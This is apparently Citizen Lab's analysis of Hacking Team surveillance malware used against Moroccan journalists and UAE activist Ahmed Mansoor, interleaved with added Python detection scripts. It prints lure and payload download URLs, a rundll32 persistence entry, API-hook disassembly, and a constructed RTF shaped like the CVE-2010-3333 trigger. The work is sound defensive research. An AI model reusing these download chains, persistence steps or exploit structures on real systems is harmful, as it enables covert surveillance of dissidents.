INTRODUCTION

In this report, Citizen Lab Security Researcher Morgan Marquis-Boire describes analysis performed on 
malicious software used to compromise a high profile dissident residing in the United Arab Emirates. The 
findings indicate that the software is a commercial surveillance backdoor distributed by an Italian company 
known as Hacking Team. The report also describes the potential involvement of vulnerabilities sold by the 
French company, VUPEN. 

In July of this year, Morgan Marquis-Boire and Bill Marczak published analysis of what appeared to be FinSpy, a commercial trojan from the FinFisher suite of surveillance tools sold by Gamma Group International. Their report, From Bahrain with Love: FinFisher's Spykit Exposed?, presented evidence consistent with the use of FinSpy to target Bahraini dissidents, both within Bahrain and abroad.

A range of other companies sell surveillance backdoors and vulnerabilities for what they describe as "lawful intercept tools." Recently CSO magazine published an article reporting on claims by the anti-virus company Dr Web that a backdoor known as "Crisis" or "DaVinci" was, in fact, the commercial surveillance tool "Remote Control System" sold by the Milan, Italy-based lawful intercept vendor Hacking Team. [1] According to an article published by Slate, the same backdoor was used to target the Moroccan citizen journalist group Mamfakinch. [2]

This report examines the targeting of Mamfakinch and evidence suggesting that the same commercial 
surveillance toolkit described in these articles appears to have also been used in a recent campaign targeting 
Ahmed Mansoor, a human rights activist based in the United Arab Emirates (UAE). Additionally, it examines 
the possibility that a vulnerability linked to the French company VUPEN was used as the vector for intrusion 
into Ahmed Mansoor's online presence. 
The findings of this report contribute to a body of evidence of a growing commercial market for offensive computer network intrusion capabilities developed by companies in Western democratic countries. While the majority of these companies claim to sell their products to a restricted client base of law enforcement, military, and intelligence agencies, this report shows another example of commercial network intrusion tools being used against dissidents in countries with poor human rights records.

The market for commercial computer network intrusion capabilities has become a focus of controversy and debate about regulatory and legal controls that might be exercised over sales to such regimes or uses of the technology to target dissidents. Following the publication of From Bahrain with Love: FinFisher's Spykit Exposed?, the UK government reaffirmed that existing controls restricting the export of cryptographic systems apply to the Gamma Group's exports of FinSpy.

In general, targeted malware attacks are an increasing problem for human rights groups, who can be particularly vulnerable to such attacks due to limited resources or lack of security awareness.

RECENT BACKGROUND: DA VINCI AND MAMFAKINCH.COM 

On Friday the 13th of July 2012, the Moroccan citizen media and journalism project Mamfakinch [3] was targeted by an electronic attack that used surveillance malware. Mamfakinch.com, a website that is frequently critical of the Moroccan government, received a message via the site's contact form directing recipients to a remote webpage:



Svp ne mentionnez pas mon nom ni rien du tout je ne veux pas d embrouilles... 
http://freeme.eu5.org/scandale%20(2).doc 

The text, which hints at a sensitive scoop or lead translates roughly as "please don't mention my name and 
don't say anything at all [about me] I don't want to get mixed up in this". 
The logs of the website reveal this message was sent from Moroccan IP space:



41.137.57.198 - - [13/Jul/2012:20:48:44 +0100] "GET /nous-contacter/ HTTP/1.1" 200 9865 "https://www.mamfakinch.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1"

41.137.57.198 - - [13/Jul/2012:20:48:46 +0100] "GET /wp-content/plugins/wp-cumulus/tagcloud.swf?r=8659047 HTTP/1.0" 200 34610 "https://www.mamfakinch.com/nous-contacter/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1"

41.137.57.198 - - [13/Jul/2012:20:48:47 +0100] "GET /nous-contacter/?_wpcf7_is_ajax_call=1&_wpcf7=2782 HTTP/1.1" 200 9886 "https://www.mamfakinch.com/nous-contacter/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1"

41.137.57.198 - - [13/Jul/2012:20:50:08 +0100] "POST /nous-contacter/ HTTP/1.1" 200 139 "https://www.mamfakinch.com/nous-contacter/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1"

41.137.57.198 - - [13/Jul/2012:20:50:12 +0100] "GET /nous-contacter/ HTTP/1.1" 200 9887 "https://www.mamfakinch.com/nous-contacter/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1"

41.137.57.198 - - [13/Jul/2012:20:50:14 +0100] "GET /nous-contacter/?_wpcf7_is_ajax_call=1&_wpcf7=2782 HTTP/1.1" 200 9888 "https://www.mamfakinch.com/nous-contacter/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1"



The IP from which the targeting message was uploaded (41.137.57.198) is from a Moroccan range dedicated 
to mobile 3G Internet users in the capital Rabat and its surroundings: 



inetnum:     41.137.56.0 - 41.137.57.255
netname:     INWI-PDSN1-Rabat001
country:     MA
admin-c:     AN2-AFRINIC
tech-c:      AN2-AFRINIC
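
The attribution step above (pulling the contact-form submission out of the access log and tying it to a source address and browser) is easy to script. The following is an added example, not part of the Citizen Lab report: it parses Apache combined-format lines, groups them by client, and reports every POST to the contact form together with the requests the same client made just before it. The log lines in the block are constructed to mirror the ones above; the second client address is made up.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" log format:
# ip ident authuser [time] "method path proto" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def find_form_submissions(lines, form_path="/nous-contacter/", window_s=600):
    """Group hits by client IP and, for every POST to the contact form, return the
    client IP, the time of the POST, the User-Agent, and the requests the same
    client made in the `window_s` seconds before it (the session that led to the
    submission). This turns the raw log into "who sent it, from where, with what"."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            by_ip[rec["ip"]].append(rec)

    submissions = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["time"])
        for post in recs:
            if post["method"] != "POST" or post["path"].split("?")[0] != form_path:
                continue
            lead_up = [
                (r["method"], r["path"]) for r in recs
                if r is not post and 0 <= (post["time"] - r["time"]).total_seconds() <= window_s
            ]
            submissions.append({
                "ip": ip,
                "posted_at": post["time"].isoformat(),
                "user_agent": post["ua"],
                "lead_up": lead_up,
            })
    return submissions

# Constructed sample: three of the requests attributed to the Mamfakinch submission
# above, plus unrelated traffic from a made-up second address.
SAMPLE_LOG = [
    '41.137.57.198 - - [13/Jul/2012:20:48:44 +0100] "GET /nous-contacter/ HTTP/1.1" 200 9865 '
    '"https://www.mamfakinch.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1"',
    '41.137.57.198 - - [13/Jul/2012:20:48:46 +0100] "GET /wp-content/plugins/wp-cumulus/tagcloud.swf?r=8659047 HTTP/1.0" 200 34610 '
    '"https://www.mamfakinch.com/nous-contacter/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1"',
    '41.137.57.198 - - [13/Jul/2012:20:50:08 +0100] "POST /nous-contacter/ HTTP/1.1" 200 139 '
    '"https://www.mamfakinch.com/nous-contacter/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1"',
    '198.51.100.7 - - [13/Jul/2012:20:49:30 +0100] "GET /2012/07/some-article/ HTTP/1.1" 200 20411 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/13.0"',
]

if __name__ == "__main__":
    for s in find_form_submissions(SAMPLE_LOG):
        print(s["ip"], s["posted_at"], s["user_agent"])
        for method, path in s["lead_up"]:
            print("   ", method, path)
```

The window is deliberately generous: a contact-form submission is usually preceded by the GET that rendered the form and by the plugin assets the page pulls in, and those are what let you confirm the POST came from a browser session rather than a script hitting the endpoint directly.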



The page at http://freeme.eu5.org/scandale%20(2).doc prompted the user to run a malicious Java applet, "adobe.jar":

53cd1d6a1cc64d4e8275a22216492b76db186cfb38cec6e7b3cfb7a87ccb3524  adobe.jar



This file then facilitated the installation of a multi-platform (OSX and Windows) backdoor. 



Archive:  adobe.jar
  Length      Date    Time    Name
---------  ---------- -----   ----
      253  2012-07-09 14:33   META-INF/MANIFEST.MF
      374  2012-07-09 14:33   META-INF/SIGNAPPL.SF
      888  2012-07-09 14:33   META-INF/SIGNAPPL.DSA
        0  2011-09-15 11:07   META-INF/
     3853  2011-09-15 11:07   WebEnhancer.class
  1043456  2012-07-09 16:33   win
   993440  2012-07-09 16:33   mac
---------                     -------
  2042264                     7 files



The contents of the .jar include two members named "win" and "mac", which are the Windows and OSX backdoors respectively:

c93074c0e60d0f9d33056fd6439205610857aa3cf54c1c20a48333b4367268ca  win
10fa7fa952dfc933b96d92ccd254a7655840250a787a1b4d9889bf2f70153791  mac
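
A quick way to triage a dropper JAR like adobe.jar, shown here as an added example rather than the report's own tooling: walk the archive, hash every member, classify each by its leading bytes instead of its name, note whether the archive carries signature blocks, and flag native executables that have no business inside an applet. The JAR the block builds is a constructed stand-in with the same layout (signature files, one class, two opaque members named "win" and "mac"); the payload bytes are placeholders, not the real malware. One detail worth knowing: Java class files and Mach-O fat binaries share the CAFEBABE magic, so the bytes after it have to be consulted.

```python
import hashlib
import io
import zipfile

SIGNATURE_SUFFIXES = (".SF", ".DSA", ".RSA", ".EC")
MACHO_THIN = (b"\xfe\xed\xfa\xce", b"\xfe\xed\xfa\xcf", b"\xce\xfa\xed\xfe", b"\xcf\xfa\xed\xfe")

def classify(data):
    """Guess a member's real type from its leading bytes, ignoring its name."""
    if data[:2] == b"MZ":
        return "pe"
    if data[:4] == b"\xca\xfe\xba\xbe":
        # Java class files and Mach-O fat ("universal") binaries share this magic.
        # A fat header continues with a small architecture count; a class file
        # continues with minor/major version words (major is 45 or more).
        nxt = int.from_bytes(data[4:8], "big")
        return "macho-fat" if 0 < nxt < 0x20 else "java-class"
    if data[:4] in MACHO_THIN:
        return "macho"
    return "unknown"

def triage_jar(jar_bytes):
    """Hash and classify every member; report signature blocks and native payloads."""
    report = {"signed": False, "members": [], "suspicious": []}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            data = z.read(info)
            name = info.filename
            upper = name.upper()
            if upper.startswith("META-INF/") and upper.endswith(SIGNATURE_SUFFIXES):
                report["signed"] = True   # signed, but by whom is a separate question
                kind = "signature"
            elif upper == "META-INF/MANIFEST.MF":
                kind = "manifest"
            else:
                kind = classify(data)
            report["members"].append({
                "name": name, "size": len(data), "kind": kind,
                "sha256": hashlib.sha256(data).hexdigest(),
            })
            if kind in ("pe", "macho", "macho-fat"):
                report["suspicious"].append(name)
    return report

def build_sample_jar():
    """Constructed stand-in with the layout of adobe.jar. Placeholder bytes only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\n")
        z.writestr("META-INF/SIGNAPPL.SF", "Signature-Version: 1.0\r\n")
        z.writestr("META-INF/SIGNAPPL.DSA", b"\x30\x82\x03\x00" + b"\x00" * 880)
        z.writestr("WebEnhancer.class", b"\xca\xfe\xba\xbe\x00\x00\x00\x32" + b"\x00" * 64)
        z.writestr("win", b"MZ\x90\x00" + b"\x00" * 1020)                        # PE/DOS header
        z.writestr("mac", b"\xca\xfe\xba\xbe\x00\x00\x00\x02" + b"\x00" * 1016)  # fat header, 2 arches
    return buf.getvalue()

if __name__ == "__main__":
    rep = triage_jar(build_sample_jar())
    print("signed:", rep["signed"])
    for m in rep["members"]:
        print(f'{m["size"]:>8}  {m["kind"]:<10} {m["sha256"][:16]}...  {m["name"]}')
    print("native payloads:", rep["suspicious"])
```

The presence of SIGNAPPL.SF/.DSA only says the JAR is signed; whether the signer is trusted, and whether the signature still verifies, needs jarsigner or a PKCS#7 parser, which this block does not attempt.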



The Windows backdoor contains a variety of clear-text strings found in the SSH client PuTTY. The OSX version of the backdoor, however, contains what appear to be debug strings referencing the name of the developer, 'guido', together with RCS build paths:

Users/guido/Projects/driver-macos/
/Users/guido/Projects/driver-macos/mchook.c
C:/RCS/jlc3V7we.app
C:/RCS/DB/temp
C:/RCS/DB/temp/1341jlc3V7we.app
C:/RCS/DB/temp$

Execution of the Windows backdoor writes the following files to disk:

C:\DOCUME~1\ADMINI~1\LOCALS~1\jlc3V7we\IZsROY7X.-MP
C:\DOCUME~1\ADMINI~1\LOCALS~1\jlc3V7we\eiYNzlgd.Cfp
C:\DOCUME~1\ADMINI~1\LOCALS~1\jlc3V7we\t2HBeaM5.0Uk
C:\DOCUME~1\ADMINI~1\LOCALS~1\jlc3V7we\WePlxpBU.wA-
C:\DOCUME~1\ADMINI~1\LOCALS~1\jlc3V7we\6EaqyFfo.zIK
C:\DOCUME~1\ADMINI~1\LOCALS~1\jlc3V7we\MUnsA3Ci.Bz7



The file 'IZsROY7X.-MP' appears to provide the main backdoor functionality:

c093b72cc249c07725ec3c2eeb1842fe56c8a27358f03778bf5464ebeddbd43c  IZsROY7X.-MP



It is executed via rundll32, and the following registry entry is created to ensure persistence:

HKU\S-1-5-21-1177238915-1336601894-725345543-500\Software\Microsoft\Windows\CurrentVersion\Run\*J7PugHy
    C:\WINDOWS\system32\rundll32.exe "C:\DOCUME~1\ADMINI~1\LOCALS~1\jlc3V7we\IZsROY7X.-MP",F1dd208

Processes such as iexplore.exe and wscntfy.exe are infected; the implant's module is injected into them. Examination of the loaded modules for "wscntfy.exe" reveals the implant alongside the networking and COM libraries it uses:

C:\DOCUME~1\ADMINI~1\LOCALS~1\jlc3V7we\IZsROY7X.-MP
C:\WINDOWS\system32\winhttp.dll
C:\WINDOWS\system32\ws2_32.dll
C:\WINDOWS\system32\ws2help.dll
C:\WINDOWS\system32\ole32.dll
C:\WINDOWS\system32\oleaut32.dll
C:\WINDOWS\system32\imm32.dll



The backdoor has been identified as a variant of a commercial backdoor sold by the Italian company Hacking Team. First identified by the Russian anti-virus company Dr Web on July 25th, 2012, the backdoor has been called "Remote Control System", "Crisis" and "DaVinci".

The Hacking Team Remote Control System (RCS) is described in a leaked copy of their promotional literature as:

"A stealth, spyware-based system for attacking, infecting and monitoring computers and smartphones. Full intelligence on target users even for encrypted communications (Skype, PGP, secure web mail, etc.)" [4]

The Hacking Team public website stipulates that their technology is sold only to a restricted customer base:

"...we provide effective, easy-to-use offensive technology to the worldwide law enforcement and intelligence communities." [5]

UAE HUMAN RIGHTS ACTIVIST COMPROMISED 

Ahmed Mansoor is a prominent UAE blogger and one of the 'UAE Five', a group of Emirati activists who were imprisoned from April to November 2011 on charges of insulting President Khalifa bin Zayed Al Nahyan, Vice President Mohammed bin Rashid Al Maktoum, and Crown Prince Mohammed bin Zayed Al Nahyan of the United Arab Emirates. [6]



On the 23rd of July, he received the following email:

[Screenshot of the email header: From: ARABIC WIKI LEAKS (a webmail address); Date: 2012/7/23; Subject: (Arabic text); To: (blank)]

This email, sent from a suggestively titled e-mail address, urges the recipient to read a 'very important message', and it contained the following attachment:



cd1fe50dbde70fb2f20d90b27a4cfe5676fa0e566a4ac14dc8dfd5c232b93933  veryimportant.doc



The attachment is malicious. To the user it appears to be a Microsoft Word document; in fact it is an RTF file containing an exploit that allows the execution of code that downloads surveillance malware.

This document exploits a previously characterized stack-based buffer overflow in Microsoft Office's RTF parser, CVE-2010-3333 [7]:

"Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability."
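
A mail-gateway or analyst check that would have flagged this attachment, given as an added example and not as anything from the report: classify the file by content rather than by extension (a ".doc" that is really RTF is the first red flag), then look for the CVE-2010-3333 trigger shape, a drawing-object pFragments property whose \sv value is far longer than the parser's fixed buffer. The threshold, the field layout and the two sample documents are constructed for the example; the lure's hex body is filler, not shellcode.

```python
import re

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

def identify_container(data):
    """Classify a document by content, not by its extension."""
    if data.startswith(OLE2_MAGIC):
        return "ole2"          # the real binary .doc format
    if data.startswith(b"PK\x03\x04"):
        return "ooxml-zip"     # .docx and friends
    if data[:4] == b"{\\rt":   # Word accepts "{\rt" as well as the full "{\rtf1"
        return "rtf"
    return "unknown"

# The CVE-2010-3333 trigger lives in a drawing-object property block:
#   {\sp{\sn pFragments}{\sv <count>;<size>;<hex data>}}
# where the hex data overruns a fixed-size stack buffer in the parser.
PFRAGMENTS_RE = re.compile(rb"\{\\sn\s+pFragments\s*\}\s*\{\\sv\s+([^}]*)\}", re.I | re.S)

def check_document(data, claimed_ext, sv_hex_limit=64):
    """Return the container type and a list of findings for one attachment.
    `sv_hex_limit` is a heuristic threshold assumed here, not a specification value."""
    findings = []
    container = identify_container(data)
    if claimed_ext.lower() in (".doc", ".dot") and container == "rtf":
        findings.append("extension claims Word binary but content is RTF")
    for m in PFRAGMENTS_RE.finditer(data):
        hex_chars = len(re.sub(rb"[^0-9a-fA-F]", b"", m.group(1)))
        if hex_chars > sv_hex_limit:
            findings.append(f"pFragments \\sv value carries {hex_chars} hex chars (CVE-2010-3333 pattern)")
    return {"container": container, "findings": findings}

# Constructed samples: a harmless RTF, and a lure with the shape of the exploit
# (the hex body is filler, not shellcode).
BENIGN_RTF = b"{\\rtf1\\ansi\\deff0 {\\fonttbl{\\f0 Arial;}} Hello\\par}"
LURE_RTF = (b"{\\rt{\\shp{\\*\\shpinst{\\sp{\\sn pFragments}{\\sv 1;1;"
            + b"41" * 400 + b"}}}}}")

if __name__ == "__main__":
    for label, blob, ext in (("benign", BENIGN_RTF, ".rtf"), ("lure", LURE_RTF, ".doc")):
        print(label, check_document(blob, ext))
```

Real exploit documents often obfuscate the control words (extra whitespace, split tokens, binary data via \bin), so a regex like this is a first-pass filter, not a verdict; the extension-versus-content mismatch is the cheaper and more robust of the two signals.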

When Ahmed Mansoor opened the document, his suspicions were aroused by the garbled text it displayed. His email account was later accessed from the following suspicious IPs:

Browser   United Arab Emirates (92.99.46.94)    Jul 26 (19 hours ago)
IMAP      United Arab Emirates (83.110.5.136)   Jul 26 (1 day ago)
IMAP      United Arab Emirates (83.110.5.136)   Jul 25 (2 days ago)
IMAP      United Arab Emirates (83.110.5.136)   Jul 24 (3 days ago)
IMAP      United Arab Emirates (83.110.5.46)    6:54 am (3 hours ago)



ANALYSIS OF "VERYIMPORTANT.DOC" 

The file "veryimportant.doc" is a downloader that fetches the second stage of the malware via HTTP:

GET /0000000031/veryimportant.doc2 HTTP/1.1
Host: ar-24.com

Examination of the sample shows the Windows API calls used to download the second stage.

The second stage is called "veryimportant.doc2":

b5462a2be69d268a7d581fe9ee36e8f31d5e1362d01626e275e8f58029e15683  veryimportant.doc2

This is also a downloader; it downloads the third stage, which appears to be the actual backdoor. The executable code is downloaded from http://ar-24.com/0000000031/veryimportant.doc3:

277cae7c249cb22ae43a605fbe901a0dc03f11e006b02d53426a6d11ad241a74  veryimportant.doc3
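
The staging itself is a hunting signal: the same client fetching veryimportant.doc2 and then veryimportant.doc3 from one host within a short window, i.e. one filename stem requested with increasing numeric suffixes. The following added example (not from the report) looks for such chains in (timestamp, client, host, path) records as a proxy log would supply them. The records, the client addresses and the time window are constructed assumptions; the first stage does not appear because it arrived by email, not over HTTP.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# "name.ext" optionally followed by a numeric stage suffix: name.doc, name.doc2, name.doc3
STAGE_RE = re.compile(r"^(?P<stem>.+?\.[A-Za-z]{2,4})(?P<stage>\d*)$")

def find_staged_downloads(records, window=timedelta(minutes=15), min_stages=2):
    """records: iterable of (timestamp, client_ip, host, path).
    Group by (client, host, directory, stem) and report chains where the same
    stem is fetched with distinct, increasing numeric suffixes inside `window`."""
    chains = defaultdict(list)
    for ts, client, host, path in records:
        directory, _, fname = path.rpartition("/")
        m = STAGE_RE.match(fname)
        if not m:
            continue
        stage = int(m.group("stage")) if m.group("stage") else 1
        chains[(client, host, directory, m.group("stem"))].append((ts, stage))

    findings = []
    for (client, host, directory, stem), hits in chains.items():
        hits.sort()
        stages = [s for _, s in hits]
        if (len(set(stages)) >= min_stages
                and hits[-1][0] - hits[0][0] <= window
                and stages == sorted(stages)):
            findings.append({
                "client": client,
                "host": host,
                "url_stem": f"http://{host}{directory}/{stem}",
                "stages": stages,
                "first_seen": hits[0][0].isoformat(),
            })
    return findings

# Constructed proxy records: the two-stage fetch from ar-24.com plus ordinary
# browsing from two made-up internal clients.
T0 = datetime(2012, 7, 23, 10, 0, 0)
SAMPLE_RECORDS = [
    (T0, "10.0.0.5", "ar-24.com", "/0000000031/veryimportant.doc2"),
    (T0 + timedelta(seconds=40), "10.0.0.5", "ar-24.com", "/0000000031/veryimportant.doc3"),
    (T0 + timedelta(minutes=3), "10.0.0.5", "www.example.org", "/news/index.html"),
    (T0 + timedelta(minutes=5), "10.0.0.9", "cdn.example.net", "/static/app.js"),
    (T0 + timedelta(minutes=6), "10.0.0.9", "cdn.example.net", "/static/app.js"),
]

if __name__ == "__main__":
    for f in find_staged_downloads(SAMPLE_RECORDS):
        print(f["client"], "->", f["url_stem"], "stages", f["stages"], "from", f["first_seen"])
```

Repeated fetches of the same unsuffixed file (app.js twice) do not count, because the set of stages has only one member; that keeps ordinary caching behaviour out of the results.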



Similar in behavior and appearance to the Windows version of the RCS backdoor that targeted Mamfakinch, 'veryimportant.doc3' contains a variety of clear-text strings found in the SSH client PuTTY. On execution, "veryimportant.doc3" writes the following files to disk:

C:\DOCUME~1\ADMINI~1\LOCALS~1\UbY5xEcD\dXRhzmn8.nmN
C:\DOCUME~1\ADMINI~1\LOCALS~1\UbY5xEcD\V461MhsH.shv
C:\DOCUME~1\ADMINI~1\LOCALS~1\UbY5xEcD\uVvJfjYa.YjG
C:\DOCUME~1\ADMINI~1\LOCALS~1\UbY5xEcD\mOCRIsaV.as_
C:\DOCUME~1\ADMINI~1\LOCALS~1\UbY5xEcD\iZ90AoPk.Pos
C:\DOCUME~1\ADMINI~1\LOCALS~1\UbY5xEcD\0j-GU9H4.H9C

The following command is run, executing the file "V461MhsH.shv":

C:\WINDOWS\System32\rundll32.exe "C:\DOCUME~1\ADMINI~1\LOCALS~1\UbY5xEcD\V461MhsH.shv",F7ed728



This then infects the following processes:

explorer.exe
iexplore.exe
wscntfy.exe
reader_sl.exe
VMwareUser.exe



For example, if we examine the process "wscntfy.exe", the following modules are loaded (base address and size in hex):

C:\DOCUME~1\ADMINI~1\LOCALS~1\UbY5xEcD\V461MhsH.shv   10000000  a0000
C:\WINDOWS\system32\winhttp.dll                        4d4f0000  59000
C:\WINDOWS\system32\ws2_32.dll                         71ab0000  17000
C:\WINDOWS\system32\ws2help.dll                        71aa0000  8000
C:\WINDOWS\system32\ole32.dll                          774e0000  13d000
C:\WINDOWS\system32\oleaut32.dll                       77120000  8b000
C:\WINDOWS\system32\imm32.dll                          76390000  1d000
Examination of this process in the memory of an infected machine reveals the following functions are hooked by the malware (the Nt*/Zw* pairs, and RtlGetNativeSystemInformation, are aliases of the same ntdll stub on this platform, which is why they share addresses):

Function: ntdll.dll!NtDeviceIoControlFile at 0x7c90d27e
Function: ntdll.dll!NtEnumerateValueKey at 0x7c90d2ee
Function: ntdll.dll!NtQueryDirectoryFile at 0x7c90d76e
Function: ntdll.dll!NtQueryKey at 0x7c90d85e
Function: ntdll.dll!NtQuerySystemInformation at 0x7c90d92e
Function: ntdll.dll!RtlGetNativeSystemInformation at 0x7c90d92e
Function: ntdll.dll!ZwDeviceIoControlFile at 0x7c90d27e
Function: ntdll.dll!ZwEnumerateValueKey at 0x7c90d2ee
Function: ntdll.dll!ZwQueryDirectoryFile at 0x7c90d76e
Function: ntdll.dll!ZwQueryKey at 0x7c90d85e
Function: ntdll.dll!ZwQuerySystemInformation at 0x7c90d92e
Function: kernel32.dll!CreateFileW at 0x7c810800
Function: kernel32.dll!CreateProcessA at 0x7c80236b
Function: kernel32.dll!CreateProcessW at 0x7c802336
Function: kernel32.dll!DeleteFileW at 0x7c831f63
Function: kernel32.dll!MoveFileW at 0x7c821261
Function: kernel32.dll!ReadConsoleA at 0x7c872b5d
Function: kernel32.dll!ReadConsoleInputA at 0x7c874613
Function: kernel32.dll!ReadConsoleInputExA at 0x7c874659
Function: kernel32.dll!ReadConsoleInputExW at 0x7c87467d
Function: kernel32.dll!ReadConsoleInputW at 0x7c874636
Function: kernel32.dll!ReadConsoleW at 0x7c872bac
Function: USER32.dll!CreateWindowExA at 0x7e42e4a9
Function: USER32.dll!CreateWindowExW at 0x7e42d0a3
Function: USER32.dll!GetMessageA at 0x7e42772b
Function: USER32.dll!GetMessageW at 0x7e4191c6
Function: USER32.dll!PeekMessageA at 0x7e42a340
Function: USER32.dll!PeekMessageW at 0x7e41929b
Function: GDI32.dll!CreateDCA at 0x77f1b7d2
Function: GDI32.dll!CreateDCW at 0x77f1be38
Function: GDI32.dll!DeleteDC at 0x77f16e5f
Function: GDI32.dll!EndDoc at 0x77f2def1
Function: GDI32.dll!EndPage at 0x77f2dc61
Function: GDI32.dll!GetDeviceCaps at 0x77f15a71
Function: GDI32.dll!SetAbortProc at 0x77f44df2
Function: GDI32.dll!StartDocA at 0x77f45e79
Function: GDI32.dll!StartDocW at 0x77f45962
Function: GDI32.dll!StartPage at 0x77f2f49e
Function: ADVAPI32.dll!CreateProcessAsUserA at 0x77e10ce8
Function: ADVAPI32.dll!CreateProcessAsUserW at 0x77dea8a9
Function: imm32.dll!ImmGetCompositionStringW at 0x7639548a



We can see the malware's injected code in the process "wscntfy.exe", in a private memory region that is marked both executable and writeable (a combination legitimately loaded modules do not normally need):

Process: wscntfy.exe Pid: 1948 Address: 0xe70000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 1, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x00e70000  55 8b ec 81 ec 1c 02 00 00 53 56 57 eb 00 eb 00   U........SVW....
0x00e70010  33 c0 89 45 fc bb 00 00 e8 00 89 5d fc 89 45 f8   3..E.......]..E.
0x00e70020  8b 5d fc 36 8d 75 08 bf 01 00 00 00 c1 e7 02 2b   .].6.u.........+
0x00e70030  e7 8b fc b9 01 00 00 00 f3 a5 ff d3 89 45 f8 8b   .............E..

0xe70000 55              PUSH EBP
0xe70001 8bec            MOV EBP, ESP
0xe70003 81ec1c020000    SUB ESP, 0x21c
0xe70009 53              PUSH EBX
0xe7000a 56              PUSH ESI
0xe7000b 57              PUSH EDI
0xe7000c eb00            JMP 0xe7000e
0xe7000e eb00            JMP 0xe70010
0xe70010 33c0            XOR EAX, EAX
0xe70012 8945fc          MOV [EBP-0x4], EAX
0xe70015 bb0000e800      MOV EBX, 0xe80000
0xe7001a 895dfc          MOV [EBP-0x4], EBX
0xe7001d 8945f8          MOV [EBP-0x8], EAX
0xe70020 8b5dfc          MOV EBX, [EBP-0x4]
0xe70023 368d7508        LEA ESI, [EBP+0x8]
0xe70027 bf01000000      MOV EDI, 0x1
0xe7002c c1e702          SHL EDI, 0x2
0xe7002f 2be7            SUB ESP, EDI
0xe70031 8bfc            MOV EDI, ESP
0xe70033 b901000000      MOV ECX, 0x1
0xe70038 f3a5            REP MOVSD
0xe7003a ffd3            CALL EBX
0xe7003c 8945f8          MOV [EBP-0x8], EAX
0xe7003f 8b              DB 0x8b
Here we see inline hooking of "NtQuerySystemInformation" performed by the malware, a technique frequently used to allow process hiding. The first five bytes of the function (the "mov eax, <syscall number>" that opens the system-call stub; the rest of the stub, "mov edx, 0x7ffe0300 / call [edx] / ret 0x10", is still visible after it) have been overwritten with a JMP to the malware's code at 0xd90000, which lies outside any loaded module:

Hook mode: Usermode
Hook type: Inline/Trampoline
Process: 1948 (wscntfy.exe)
Victim module: ntdll.dll (0x7c900000 - 0x7c9b2000)
Function: ntdll.dll!NtQuerySystemInformation at 0x7c90d92e
Hook address: 0xd90000
Hooking module: <unknown>

Disassembly(0):
0x7c90d92e e9cd264884       JMP 0xd90000
0x7c90d933 ba0003fe7f       MOV EDX, 0x7ffe0300
0x7c90d938 ff12             CALL DWORD [EDX]
0x7c90d93a c21000           RET 0x10
0x7c90d93d 90               NOP
0x7c90d93e b8ae000000       MOV EAX, 0xae
0x7c90d943 ba               DB 0xba
0x7c90d944 0003             ADD [EBX], AL

Disassembly(1):
0xd90000 55                 PUSH EBP
0xd90001 8bec               MOV EBP, ESP
0xd90003 83ec0c             SUB ESP, 0xc
0xd90006 53                 PUSH EBX
0xd90007 56                 PUSH ESI
0xd90008 57                 PUSH EDI
0xd90009 eb00               JMP 0xd9000b
0xd9000b eb00               JMP 0xd9000d
0xd9000d 33c0               XOR EAX, EAX
0xd9000f 8945f4             MOV [EBP-0xc], EAX
0xd90012 8945f8             MOV [EBP-0x8], EAX
0xd90015 bb                 DB 0xbb
0xd90016 0000               ADD [EAX], AL
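
Two things an analyst does with output like this, written up here as an added example (not the report's or Volatility's code): decode the overwritten prologue to find where the hook lands and whether it leaves the victim module, and translate the hooked-function list above into the capabilities it implies. The bytes, addresses and module range come from the listings on this page; the clean "mov eax, 0xad" stub used for the byte comparison is assumed to be the Windows XP SP3 ntdll stub, and the API-to-capability mapping is the analyst's interpretation, not a vendor-documented one.

```python
import re
import struct

def decode_inline_hook(addr, code, module_range):
    """Inspect bytes read from a live process at an exported function's address.
    Returns (kind, target, target_outside_module) for the common redirection
    patterns, or None if the entry does not start with one:
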